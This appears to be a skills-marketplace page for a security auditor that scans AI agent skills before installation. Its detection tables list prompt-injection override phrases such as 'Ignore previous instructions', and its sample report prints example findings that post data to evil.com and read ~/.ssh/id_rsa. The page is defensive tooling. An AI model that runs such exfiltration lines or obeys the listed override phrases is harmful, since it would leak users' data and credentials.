Run any Skill in Manus with one click

skill-security-auditor

Security audit and vulnerability scanner for AI agent skills before installation. Use when: (1) evaluating a skill from an untrusted source, (2) auditing a skill directory or git repo URL for malicious code, (3) pre-install security gate for Claude Code plugins, OpenClaw skills, or Codex skills, (4) scanning Python scripts for dangerous patterns like os.system, eval, subprocess, network exfiltration, (5) detecting prompt injection in SKILL.md files, (6) checking dependency supply chain risks, (7) verifying file system access stays within skill boundaries. Triggers: "audit this skill", "is this skill safe", "scan skill for security", "check skill before install", "skill security check", "skill vulnerability scan".

Run Skill in Manus

Overview

Install command

npx skills add https://github.com/alirezarezvani/claude-skills --skill skill-security-auditor

Copy and paste this command into Claude Code to install the skill

Source

alirezarezvani/claude-skills

Stars17,037

Forks2,335

UpdatedMay 10, 2026 at 07:21

File Explorer

3 files

SKILL.md

readonly

More from this repository

same repository

webinar-marketing

alirezarezvani/claude-skills

When the user wants to plan, promote, run, or improve a webinar or virtual event to generate and convert demand. Use when the user mentions 'webinar,' 'virtual event,' 'online event,' 'live demo,' 'virtual summit,' 'workshop,' 'masterclass,' 'fireside chat,' 'roundtable,' 'registration funnel,' 'show-up rate,' 'attendance rate,' 'webinar promotion,' 'webinar follow-up,' or 'on-demand webinar.' Also use when they have a webinar that isn't converting — low registrations, low show-up, or attendees who don't buy — and want to diagnose and fix it. Covers the full funnel: registration, promotion, show-up, live engagement, live-to-close, and post-event nurture. Distinct from launch-strategy (full product launches) and email-sequence (lifecycle nurture) — this is the end-to-end webinar/event motion. NOT for in-person field events logistics, and NOT for generic lifecycle email (use email-sequence).

2026-06-0317.0k

md-slides

alirezarezvani/claude-skills

Converts a markdown deck (slides separated by `

2026-06-0317.0k

youtube-full

alirezarezvani/claude-skills

Use when the user needs YouTube transcripts, video search, channel browsing, playlist extraction, or content monitoring. Trigger phrases: 'get the transcript for', 'search YouTube for', 'what are the latest videos on', 'list this playlist', 'monitor this channel', or any request involving a YouTube URL, video ID, or @handle. Do NOT use for downloading video or audio files, YouTube engagement data (likes, comments), or private/age-restricted videos.

2026-06-0317.0k

md-review

alirezarezvani/claude-skills

Converts a markdown PR writeup or code review (one with ```diff fenced blocks and severity-tagged > [!BLOCKER]/[!MAJOR]/[!MINOR]/[!NIT] callouts) into a single-file 2-column HTML review — unified-diff on the left, severity-tagged annotation cards on the right, top jump-nav listing every finding, mandatory named reviewer footer. Triggers when the markdown-html-orchestrator classifies an input as REVIEW, or when invoked directly via /cs:md-review. Refuses without explicit --reviewer (a code review must name a human), refuses if no diff hunks present (route to md-document instead), and refuses to encode severity in color only (every badge ships color + icon + aria-label per WCAG 1.4.1). Use after orchestrator routing.

2026-06-0317.0k

md-document

alirezarezvani/claude-skills

Converts long-form markdown (specs, RFCs, reports, plans, explainers) into a single-file, lightly-interactive HTML document with sticky TOC, scrollspy, search filter, code-copy buttons, and design-system-driven brand tokens. Triggers when the markdown-html-orchestrator classifies an input as DOCUMENT, or when invoked directly via /cs:md-document. Reads the design-system config via config_loader.py and inlines the user's 12 derived CSS custom properties; refuses to render if onboarding hasn't run. Single-file output — Google Fonts + Prism.js CDN are the only externals; no framework runtime, no build step. Use after orchestrator routing or after design-system onboarding is confirmed.

2026-06-0217.0k

universal-scraping-architect

alirezarezvani/claude-skills

Use for web scraping, crawling, document extraction, API parsing, or building validation-heavy data pipelines using Firecrawl or local Python scripts.

2026-05-2917.0k

Source

alirezarezvani

alirezarezvani/claude-skills

View GitHub Repository View Creator Repositories

Install command

Download

Run Skill in Manus

Useful forSOC

Information Security AnalystsComputer and Mathematical Occupations15-1212L4

name

skill-security-auditor

description

Skill Security Auditor

Scan and audit AI agent skills for security risks before installation. Produces a clear PASS / WARN / FAIL verdict with findings and remediation guidance.

Quick Start

# Audit a local skill directory
python3 scripts/skill_security_auditor.py /path/to/skill-name/

# Audit a skill from a git repo
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name

# Audit with strict mode (any WARN becomes FAIL)
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict

# Output JSON report
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json

What Gets Scanned

1. Code Execution Risks (Python/Bash Scripts)

Scans all .py, .sh, .bash, .js, .ts files for:

Category	Patterns Detected	Severity
Command injection	`os.system()`, `os.popen()`, `subprocess.call(shell=True)`, backtick execution	🔴 CRITICAL
Code execution	`eval()`, `exec()`, `compile()`, `__import__()`	🔴 CRITICAL
Obfuscation	base64-encoded payloads, `codecs.decode`, hex-encoded strings, `chr()` chains	🔴 CRITICAL
Network exfiltration	`requests.post()`, `urllib.request`, `socket.connect()`, `httpx`, `aiohttp`	🔴 CRITICAL
Credential harvesting	reads from `~/.ssh`, `~/.aws`, `~/.config`, env var extraction patterns	🔴 CRITICAL
File system abuse	writes outside skill dir, `/etc/`, `~/.bashrc`, `~/.profile`, symlink creation	🟡 HIGH
Privilege escalation	`sudo`, `chmod 777`, `setuid`, cron manipulation	🔴 CRITICAL
Unsafe deserialization	`pickle.loads()`, `yaml.load()` (without SafeLoader), `marshal.loads()`	🟡 HIGH
Subprocess (safe)	`subprocess.run()` with list args, no shell	⚪ INFO

2. Prompt Injection in SKILL.md

Scans SKILL.md and all .md reference files for:

Pattern	Example	Severity
System prompt override	"Ignore previous instructions", "You are now..."	🔴 CRITICAL
Role hijacking	"Act as root", "Pretend you have no restrictions"	🔴 CRITICAL
Safety bypass	"Skip safety checks", "Disable content filtering"	🔴 CRITICAL
Hidden instructions	Zero-width characters, HTML comments with directives	🟡 HIGH
Excessive permissions	"Run any command", "Full filesystem access"	🟡 HIGH
Data extraction	"Send contents of", "Upload file to", "POST to"	🔴 CRITICAL

3. Dependency Supply Chain

For skills with requirements.txt, package.json, or inline pip install:

Check	What It Does	Severity
Known vulnerabilities	Cross-reference with PyPI/npm advisory databases	🔴 CRITICAL
Typosquatting	Flag packages similar to popular ones (e.g., `reqeusts`)	🟡 HIGH
Unpinned versions	Flag `requests>=2.0` vs `requests==2.31.0`	⚪ INFO
Install commands in code	`pip install` or `npm install` inside scripts	🟡 HIGH
Suspicious packages	Low download count, recent creation, single maintainer	⚪ INFO

4. File System & Structure

Check	What It Does	Severity
Boundary violation	Scripts referencing paths outside skill directory	🟡 HIGH
Hidden files	`.env`, dotfiles that shouldn't be in a skill	🟡 HIGH
Binary files	Unexpected executables, `.so`, `.dll`, `.exe`	🔴 CRITICAL
Large files	Files >1MB that could hide payloads	⚪ INFO
Symlinks	Symbolic links pointing outside skill directory	🔴 CRITICAL

Audit Workflow

Run the scanner on the skill directory or repo URL
Review the report — findings grouped by severity
Verdict interpretation:
- ✅ PASS — No critical or high findings. Safe to install.
- ⚠️ WARN — High/medium findings detected. Review manually before installing.
- ❌ FAIL — Critical findings. Do NOT install without remediation.
Remediation — each finding includes specific fix guidance

Reading the Report

╔══════════════════════════════════════════════╗
║  SKILL SECURITY AUDIT REPORT                ║
║  Skill: example-skill                        ║
║  Verdict: ❌ FAIL                            ║
╠══════════════════════════════════════════════╣
║  🔴 CRITICAL: 2  🟡 HIGH: 1  ⚪ INFO: 3    ║
╚══════════════════════════════════════════════╝

🔴 CRITICAL [CODE-EXEC] scripts/helper.py:42
   Pattern: eval(user_input)
   Risk: Arbitrary code execution from untrusted input
   Fix: Replace eval() with ast.literal_eval() or explicit parsing

🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88
   Pattern: requests.post("https://evil.com/collect", data=results)
   Risk: Data exfiltration to external server
   Fix: Remove outbound network calls or verify destination is trusted

🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15
   Pattern: open(os.path.expanduser("~/.ssh/id_rsa")) <!-- noqa: SEC-AUDITOR -->
   Risk: Reads SSH private key outside skill scope
   Fix: Remove filesystem access outside skill directory

⚪ INFO [DEPS-UNPIN] requirements.txt:3
   Pattern: requests>=2.0
   Risk: Unpinned dependency may introduce vulnerabilities
   Fix: Pin to specific version: requests==2.31.0

Advanced Usage

Audit a Skill from Git Before Cloning

# Clone to temp dir, audit, then clean up
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup

CI/CD Integration

# GitHub Actions step
- name: "audit-skill-security"
  run: |
    python3 skill-security-auditor/scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
    if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi

Batch Audit

# Audit all skills in a directory
for skill in skills/*/; do
  python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
done

Threat Model Reference

For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see references/threat-model.md.

Limitations

Cannot detect logic bombs or time-delayed payloads with certainty
Obfuscation detection is pattern-based — a sufficiently creative attacker may bypass it
Network destination reputation checks require internet access
Does not execute code — static analysis only (safe but less complete than dynamic analysis)
Dependency vulnerability checks use local pattern matching, not live CVE databases

When in doubt after an audit, don't install. Ask the skill author for clarification.